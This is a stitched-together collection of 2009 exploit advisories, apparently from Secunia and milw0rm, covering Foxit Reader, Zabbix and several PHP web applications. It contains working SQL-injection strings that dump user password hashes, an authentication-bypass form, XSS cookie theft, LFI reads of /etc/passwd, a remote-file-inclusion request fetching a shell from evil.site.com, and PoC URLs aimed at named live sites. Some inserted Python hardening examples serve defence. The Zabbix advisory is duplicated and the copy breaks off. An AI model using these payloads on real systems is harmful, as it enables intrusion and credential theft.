Secunia Research 09/03/2009
- Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability -
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
1) Affected Software
* Foxit Reader version 3.0.2009.1301
NOTE: Prior versions may also be affected.
2) Severity
Rating: Highly critical
Impact: System access
Where: Remote
3) Vendor's Description of Software
"As a small and fast PDF viewer, Foxit Reader currently has over 50
million users all around the world. After keeping users waiting for
almost two months, Foxit Reader 3.0 has been released and introduces
many fascinating new features such as multimedia design and Foxit
OnDemand Content Management."
Product Link:
http://www.foxitsoftware.com/pdf/rd_intro.php
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in Foxit Reader, which
can be exploited by malicious people to potentially compromise a
user's system.
The vulnerability is caused due to an error when processing JBIG2
symbol dictionary segments. This can be exploited to dereference
uninitialised memory via a specially crafted PDF file.
Successful exploitation may allow execution of arbitrary code.
5) Solution
Update to version 3.0 Build 1506 or version 2.3 Build 3902.
6) Time Table
27/02/2009 - Vendor notified.
28/02/2009 - Vendor response.
09/03/2009 - Public disclosure.
7) Credits
Discovered by Alin Rad Pop, Secunia Research.
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0191 for the vulnerability.
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-11/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
Blogsa <= 1.0 Beta 3 XSS Vulnerability
Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability
Software Site: blogsa.net
Discovered by: Onur YILMAZ aka DJR
Blog: http://www.onuryilmaz.info
E-mail: contactonuryilmazinfo
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script>
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
CMS S.Builder <= 3.7 Remote File Inclusion Vulnerability
CMS S.Builder <= 3.7 RFI Vulnerability
Information:
Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions
Description:
The engine of this CMS generates site files (index.php, etc.) containing code like:
PHP Code:
if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...
If register_globals=On, an attacker can place a remote URL (if allow_url_fopen=On) or a local path in the binn_include_path variable.
PoC:
HTTP Request:
GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?
# by cr0w
# http://cr0w-at.blogspot.com
# milw0rm
nForum 1.5 Multiple Remote SQL Injection Vulnerabilities
Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allow a guest to view the username and
password of a registered user.
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
# milw0rm
OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability
Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd
Bug: ./oozv1657/common/login.php (line: 104)
require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
isiAJAX v1 (paises.php id) Remote SQL Injection Vulnerability
Script site: http://isiajax.sourceforge.net/
Download: http://sourceforge.net/project/showfiles.php?group_id=169754
[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--
Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)
$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> //
}
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
BlueEye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
found by ka0x
Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off
- Vuln code:
10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); // -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: ... Logged as: ".$logged." (ID: ".$logged_id.")
Proof Of Concept:
javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";
# milw0rm
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew, don't just play games all the time :p
# milw0rm
NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability
Program: NovaBoard
Version: <= 1.0.1
File affected: index.php
Download: http://www.novaboard.net/
Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (from the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
<script>alert(document.cookie)</script>
You can also send the user's cookie to another site.
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm
BlindBlog 1.3.1 (SQL/AB/LFI) Multiple Remote Vulnerabilities
Application: BlindBlog
Version: 1.3.1
Website: http://sourceforge.net/projects/cbblog/
Bugs:
[A] SQL Injection
[B] Authentication Bypass
[C] Local File Inclusion
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] SQL Injection
Requisites: magic_quotes_gpc = off
File affected: comment.php
All queries are vulnerable.
This bug allows a guest to view the username and
password of a registered user.
$id = (isset($_GET['id']) && $_GET['id'] !='') ? $_GET['id'] : getlastid();
$SQL = "SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC";
$resulted = $db->query($SQL, $querys);
while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;
- [B] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: admin.login.php
$username = $_POST['username'];
$password = md5($_POST['password']);
include('./db_config.php');
$db = new db_stuff;
$db->connect();
$result = $db->query("SELECT * FROM `cblog_users` WHERE `username` =
'$username'", $querys);
if (mysql_num_rows($result) > 1 || mysql_num_rows($result) < 1)
{
echo "Incorrect username";
exit;
}
$result = mysql_fetch_assoc($result);
if ($result['password'] !== $password)
{
echo 'Incorrect Password';
exit;
}
- [C] Local File Inclusion
Requisites: none
File affected: admin.php
This bug allows an admin to include local files.
Authentication can be bypassed using the
previous bug.
With this bug it is possible to execute remote
commands using Apache logs.
...
} else if (isset($_GET['act']) && $_SESSION['is_admin'])
{
$loc = 'admin.'.$_GET['act'].'.php';
include('./'.$loc);
}
...
Code
- [A] SQL Injection
http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23
- [B] Authentication Bypass
<html>
<head>
<title>BlindBlog 1.3.1 Authentication Bypass Exploit</title>
</head>
<body>
<form
action="http://www.site.com/path/admin/admin.login.php?go=1"
method="POST">
<input type="hidden" name="username" value="-1'
UNION ALL SELECT
1,'admin',MD5('expl')#">
<input type="hidden" name="password" value="expl">
<input type="submit" value="Exploit">
</form>
</body>
</html>
- [C] Local File Inclusion
Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php
http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd
# milw0rm
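As an added example (not BlindBlog's code), here is the admin.login.php flow above rewritten in Python with sqlite3, where the username is bound as a query parameter instead of being spliced into the SQL; the in-memory cblog_users table, the user record and the helper names are constructed for this example, and the md5 column mirrors only the page's schema. The same parameter binding is the fix for the cookie-driven query in the Blue Eye CMS post above.

```python
import hashlib
import hmac
import sqlite3

# Added example modelled on the admin.login.php flow quoted in the BlindBlog
# advisory: look up the username, require exactly one row, compare the stored
# hash with md5(password). Not BlindBlog's code. The md5 column mirrors the
# page's schema only; a real fix would also move to a slow password hash.


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_db(users):
    """Constructed in-memory stand-in for the cblog_users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cblog_users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)"
    )
    for uid, name, plain in users:
        conn.execute("INSERT INTO cblog_users VALUES (?, ?, ?)", (uid, name, md5_hex(plain)))
    return conn


def login(conn, username, password):
    """Hardened lookup.

    The original builds "... WHERE `username` = '$username'" by string
    concatenation, so a username carrying UNION ALL SELECT ... appends a row
    whose password column the attacker chose: the "exactly one row" check and
    the hash compare both pass on that fabricated row. With a bound parameter
    the whole username is data, and only rows that really exist in
    cblog_users can come back.
    """
    rows = conn.execute(
        "SELECT password FROM cblog_users WHERE username = ?", (username,)
    ).fetchall()
    if len(rows) != 1:                       # keeps the page's row-count check
        return False
    # Compare against the value stored in the table, in constant time.
    return hmac.compare_digest(rows[0][0], md5_hex(password))


if __name__ == "__main__":
    db = make_db([(1, "admin", "s3cret")])   # constructed record
    print(login(db, "admin", "s3cret"))      # True
    print(login(db, "-1' UNION ALL SELECT 1,'admin',MD5('expl')#", "expl"))  # False
```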
Zabbix 1.6.2 Frontend Multiple Vulnerabilities
Name: Multiple Vulnerabilities in Zabbix Frontend
Systems Affected: Zabbix 1.6.2 and possibly earlier versions
Severity: High
Impact (CVSSv2): High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
Vendor: http://www.zabbix.com/
Advisory: http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
Authors: Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT digitalbullets DOT org)
I. BACKGROUND
From the Zabbix web site: "ZABBIX offers advanced monitoring, alerting
and visualization features today which are missing in other monitoring
systems, even some of the best commercial ones".
II. DESCRIPTION
Multiple Vulnerabilities exist in Zabbix front end software.
III. ANALYSIS
Summary:
A) Remote Code Execution
B) Cross Site Request Forgery
C) Local File Inclusion
A) Remote Code Execution
A Remote Code Execution issue has been found in Zabbix version
1.6.2 and no authentication is required in order to exploit this
vulnerability. The Magic Quotes must be off in order to exploit
this vulnerability, however this feature will not be supported
starting with PHP 6.0 (ref. http://it2.php.net/magic_quotes).
Zabbix has a security feature that parses all incoming input for
possible bad chars with the help of the function check_fields() defined
in "include/validate.inc.php". The issue we have discovered is contained
in this input validation code.
Pages define an array of every used variable that derives from external
(GPC) input. An example of the mechanism is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$fields=array(
"config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
// actions
"groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
PAGE_SIZE."==0)", NULL),
"next"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
"prev"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
// filter
"filter_rst"=> array(T_ZBX_INT, O_OPT, P_SYS, IN(array(0,1)), NULL),
"filter_set"=> array(T_ZBX_STR, O_OPT, P_SYS, null, NULL),
"userid"=> array(T_ZBX_INT, O_OPT, P_SYS, DB_ID, NULL),
'filter_timesince'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
'filter_timetill'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
//ajax
'favobj'=> array(T_ZBX_STR, O_OPT, P_ACT, NULL, NULL),
'favid'=> array(T_ZBX_STR, O_OPT, P_ACT, NOT_EMPTY,
'isset({favobj})'),
'state'=> array(T_ZBX_INT, O_OPT, P_ACT, NOT_EMPTY,
'isset({favobj}) && ("filter"=={favobj})'),
);
check_fields($fields);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
After the definition of the "$fields" array all the variables are
checked by the function check_fields().
The main step of the check_fields() function is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
foreach($fields as $field => $checks){
$err |= check_field($fields, $field, $checks);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
Following the check_field() function, we identified that its main steps
are the creation of some local variables using list() and a subsequent
call to calc_exp() (which resides in the same file).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
list($type, $opt, $flags, $validation, $exception) = $checks;
[...]
$except=calc_exp($fields,$field,$exception);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
calc_exp()'s code is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp($fields,$field,$expression){
if(zbx_strstr($expression,"{}") && !isset($_REQUEST[$field]))
return FALSE;
if(zbx_strstr($expression,"{}") && !is_array($_REQUEST[$field]))
$expression = str_replace("{}",'$_REQUEST["'.$field.'"]',$expression);
if(zbx_strstr($expression,"{}") && is_array($_REQUEST[$field])){
foreach($_REQUEST[$field] as $key => $val){
$expression2 =
str_replace("{}",'$_REQUEST["'.$field.'"]["'.$key.'"]',$expression);
if(calc_exp2($fields,$field,$expression2)==FALSE)
return FALSE;
}
return TRUE;
}
return calc_exp2($fields,$field,$expression);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
As you can see, to reach calc_exp2(), our vulnerable function, we must
avoid every branch of calc_exp() that returns early.
Investigating calc_exp2()'s source:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp2($fields,$field,$expression){
foreach($fields as $f => $checks){
$expression = str_replace('{'.$f.'}','$_REQUEST["'.$f.'"]',$expression);
}
$expression = trim($expression,"& ");
$exec = "return (".$expression.") ? 1 : 0;";
$ret = eval($exec);
return $ret;
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
We have reached a function that passes the "$exec" variable, which
contains user-controlled data, to eval().
To understand how the executed string is composed we need a page that
reaches this code. Thanks to "locales.php" we can reach this function
without any authentication.
Now if we try to execute the query:
/locales.php?download&langTo&extlang[AAA]=1
The value of $exec is the following:
return (($_REQUEST["extlang"]["AAA"]!='')) ? 1 : 0;
Some constraints exist: the injected payload must comply with the
calc_exp()'s requirements in order to call calc_exp2() and the created
string must be syntactically correct. What we can do is to play with
the key values of the array. An intermediate test was:
/locales.php?download&langTo&extlang[AAA"];phpinfo();]=1
But it generates a syntax error. After some thinking the problem was
solved in this way:
/locales.php?download&langTo&extlang[".phpinfo()."]=1
Now the syntax is correct and the payload gets executed.
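To make the mechanism concrete from the defender's side, here is an added Python model (not Zabbix's code, written for this page) that rebuilds the string calc_exp()/calc_exp2() would hand to eval() without evaluating anything, adds the array-key check that closes the hole, and scans constructed access-log lines for request keys that would break out of the quoted literal. It assumes the NOT_EMPTY template is "({}!='')", inferred from the $exec string printed above; the function names and log lines are invented.

```python
import re
from urllib.parse import parse_qsl

# Added, illustrative model of the calc_exp()/calc_exp2() logic quoted in the
# advisory. It is not Zabbix's code and it never calls eval(): it only shows
# which string would reach eval() and which request keys a validator must
# reject before they are interpolated into that string.

# Assumed: the NOT_EMPTY validation template, inferred from the $exec string
# the advisory prints for extlang[AAA]=1.
NOT_EMPTY = "({}!='')"

# A key made only of word characters cannot close the "..." literal around it.
SAFE_KEY = re.compile(r"^[A-Za-z0-9_]*$")

# Query-string shape field[key]=value, which PHP turns into an array value.
ARRAY_PARAM = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)\[(.*)\]$", re.DOTALL)


def build_exec_string(field, key=None, expression=NOT_EMPTY, fields=()):
    """Rebuild the string calc_exp()/calc_exp2() would hand to eval().

    key=None models a scalar request value; a string models one array key.
    `fields` lists the page's $fields names so {name} references resolve too.
    """
    if key is None:
        ref = '$_REQUEST["' + field + '"]'
    else:
        ref = '$_REQUEST["' + field + '"]["' + key + '"]'
    expression = expression.replace("{}", ref)               # calc_exp()
    for f in fields:                                          # calc_exp2()
        expression = expression.replace("{" + f + "}", '$_REQUEST["' + f + '"]')
    expression = expression.strip("& ")                       # trim($expression, "& ")
    return "return (" + expression + ") ? 1 : 0;"


def is_safe_key(key):
    """True when the key can sit inside a double-quoted PHP literal verbatim."""
    return SAFE_KEY.match(key) is not None


def guarded_build(field, key=None, expression=NOT_EMPTY, fields=()):
    """Hardened variant: return None (like calc_exp()'s FALSE) for any array
    key that is not a plain word, instead of interpolating it into code."""
    if key is not None and not is_safe_key(key):
        return None
    return build_exec_string(field, key, expression, fields)


def audit_query_string(qs):
    """Return [(field, key)] for every array parameter whose key is unsafe."""
    hits = []
    for name, _value in parse_qsl(qs, keep_blank_values=True):
        m = ARRAY_PARAM.match(name)
        if m and not is_safe_key(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


def audit_access_log(lines):
    """Return 1-based numbers of common-log-format lines whose request carries
    an array key that would break out of the generated expression."""
    flagged = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"', line)
        if not m:
            continue
        _path, _sep, qs = m.group(1).partition("?")
        if audit_query_string(qs):
            flagged.append(n)
    return flagged


# Constructed log lines; lines 1 and 3 carry the two request URIs the advisory
# shows (the quotes in line 3 are URL-encoded, as a browser would send them).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Mar/2009:10:00:00 +0000] "GET /locales.php?download&langTo&extlang[AAA]=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [03/Mar/2009:10:00:07 +0000] "GET /dashboard.php HTTP/1.1" 200 4096',
    '10.0.0.5 - - [03/Mar/2009:10:00:09 +0000] "GET /locales.php?download&langTo&extlang[%22.phpinfo().%22]=1 HTTP/1.1" 200 9012',
]

if __name__ == "__main__":
    print(build_exec_string("extlang", "AAA"))     # the $exec string quoted in the advisory
    print("guarded:", guarded_build("extlang", 'a"b'))   # None: constructed unsafe key rejected
    print("flagged log lines:", audit_access_log(SAMPLE_LOG))   # [3]
```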
B) Cross Site Request Forgery
A CSRF vulnerability exists in file "users.php". If the admin visits the
following link:
/users.php?config=0&save&alias=alias&name=foo&surname=foo&user_type=3&
lang=lang&theme=theme&autologout=0&url=url&refresh=0
A user with admin permissions is created.
C) Local File Inclusion
If the user is authenticated, a Local File Inclusion vulnerability
exists in file "locales.php".
The following URL exploits this vulnerability:
/locales.php?action=1&next=1&srclang=../validate&extlang=en
The string ".inc.php" is automatically appended to the local file path.
Despite that, it is possible to include any target file by truncating
the filename with a null byte:
/locales.php?next=1&srclang=../../../../../../../var/log/apache2/error_log%22
Null byte injection normally requires magic quotes off.
The vulnerable code is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
'srclang'=> array(T_ZBX_STR, O_OPT, NULL, NOT_EMPTY, 'isset({next})'),
[...]
else if(isset($_REQUEST['next'])){
[...]
$fileFrom = 'include/locales/'.$_REQUEST['srclang'].".inc.php";
if(file_exists($fileFrom)){
include($fileFrom);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
IV. DETECTION
Zabbix 1.6.2 and possibly earlier versions are vulnerable.
V. WORKAROUND
Update Zabbix from the SVN server (svn://svn.zabbix.com) or download
version 1.6.3 when available.
VI. VENDOR RESPONSE
Vendor will fix all the exposed vulnerabilities in Zabbix 1.6.3.
VII. CVE INFORMATION
No CVE at this time.
VIII. DISCLOSURE TIMELINE
20081215 Bug discovered
20090116 Initial vendor contact
20090116 Vendor Response (Fixes will be included in Zabbix 1.6.3)
20090130 Second email (When this is going to be fixed?)
20090131 Vendor Response (Everything has been fixed a week ago and is
publicly available in the SVN, Zabbix 1.6.3 will be released
within 10-15 days)
20090220 Third email (20 days elapsed and no response, we will release
on 23 Feb)
20090220 Vendor Response (Postpone of 5-10 days required)
20090220 Third email (We will wait 5-10 days, 2 March is the deadline
if no contact)
20090303 Forced Advisory Release
IX. CREDIT
Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
"evilaliv3" Pellerano are credited with the discovery of this
vulnerability.
Antonio "s4tan" Parata
web site: http://www.ictsc.it/
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it
Giovanni "evilaliv3" Pellerano
web site: http://www.evilaliv3.org
mail: giovanni.pellerano AT evilaliv3 DOT org
X. LEGAL NOTICES
Copyright (c) 2009 Francesco "ascii" Ongaro
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
# milw0rm
Systems Affected Zabbix 1.6.2 and possibly earlier versions
Severity High
Impact (CVSSv2) High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
Vendor http://www.zabbix.com/
Advisory http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT
digitalbullets DOT org)
I. BACKGROUND
From the Zabbix web site: "ZABBIX offers advanced monitoring, alerting
and visualization features today which are missing in other monitoring
systems, even some of the best commercial ones".
II. DESCRIPTION
Multiple Vulnerabilities exist in Zabbix front end software.
III. ANALYSIS
Summary:
A) Remote Code Execution
B) Cross Site Request Forgery
C) Local File Inclusion
A) Remote Code Execution
A Remote Code Execution issue has been found in Zabbix version
1.6.2 and no authentication is required in order to exploit this
vulnerability. The Magic Quotes must be off in order to exploit
this vulnerability, however this feature will not be supported
starting with PHP 6.0 (ref. http://it2.php.net/magic_quotes).
Zabbix has a security feature that parses all incoming input for
possibly bad characters with the help of the function check_fields(),
defined in "include/validate.inc.php". The issue we have discovered
lies in this input validation code.
Each page defines an array of every variable it uses that derives from
external (GPC) input. An example of the mechanism is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$fields=array(
    "config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
    // actions
    "groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
    "hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
    "start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
        PAGE_SIZE."==0)", NULL),
    "next"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
    "prev"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
    // filter
    "filter_rst"=> array(T_ZBX_INT, O_OPT, P_SYS, IN(array(0,1)), NULL),
    "filter_set"=> array(T_ZBX_STR, O_OPT, P_SYS, null, NULL),
    "userid"=> array(T_ZBX_INT, O_OPT, P_SYS, DB_ID, NULL),
    'filter_timesince'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
    'filter_timetill'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
    //ajax
    'favobj'=> array(T_ZBX_STR, O_OPT, P_ACT, NULL, NULL),
    'favid'=> array(T_ZBX_STR, O_OPT, P_ACT, NOT_EMPTY,
        'isset({favobj})'),
    'state'=> array(T_ZBX_INT, O_OPT, P_ACT, NOT_EMPTY,
        'isset({favobj}) && ("filter"=={favobj})'),
);
check_fields($fields);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
After the definition of the "$fields" array all the variables are
checked by the function check_fields().
The main step of the check_fields() function is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
foreach($fields as $field => $checks){
    $err |= check_field($fields, $field, $checks);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
Following the check_field() function, we identified that its main
steps are the creation of some local variables using list() and a
subsequent call to calc_exp() (which resides in the same file).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
list($type, $opt, $flags, $validation, $exception) = $checks;
[...]
$except=calc_exp($fields,$field,$exception);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
calc_exp()'s code is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp($fields,$field,$expression){
    if(zbx_strstr($expression,"{}") && !isset($_REQUEST[$field]))
        return FALSE;
    if(zbx_strstr($expression,"{}") && !is_array($_REQUEST[$field]))
        $expression = str_replace("{}",'$_REQUEST["'.$field.'"]',$expression);
    if(zbx_strstr($expression,"{}") && is_array($_REQUEST[$field])){
        foreach($_REQUEST[$field] as $key => $val){
            $expression2 =
                str_replace("{}",'$_REQUEST["'.$field.'"]["'.$key.'"]',$expression);
            if(calc_exp2($fields,$field,$expression2)==FALSE)
                return FALSE;
        }
        return TRUE;
    }
    return calc_exp2($fields,$field,$expression);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
As you can see, we can reach calc_exp2(), the vulnerable function, as
long as we avoid the branches that return early from calc_exp().
